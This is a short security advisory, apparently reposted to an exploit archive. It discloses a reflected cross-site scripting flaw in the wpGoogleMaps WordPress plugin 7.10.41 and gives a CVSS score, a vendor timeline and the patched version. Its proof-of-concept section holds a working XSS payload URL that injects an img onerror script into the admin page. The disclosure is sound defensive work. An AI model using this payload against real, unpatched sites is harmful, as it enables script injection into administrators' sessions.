WordPress wpGoogleMaps 7.10.41 Cross Site Scripting

WordPress wpGoogleMaps plugin version 7.10.41 suffers from a cross site scripting vulnerability.


MD5 | 356e04d4a085a90d5fb5f56c87053aa5

  * Vulnerability: XSS
* Affected Software:
[wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/)
* Affected Version: 7.10.41
* Patched Version: 7.10.43
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 10/31/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it
echoes PHP_SELF without proper encoding.

##### Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php/'"><img src=x
onerror=alert(1)>?page=wp-google-maps-menu&action=foo

##### Timeline

- 10/25/2018 Sent advisory
- 10/25/2018 Vendor confirms and releases fix
- 10/25/2018 Suggested improvement for fix
- 10/31/2018 Vendor releases improved fix
- 02/05/2019 Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89



Related Posts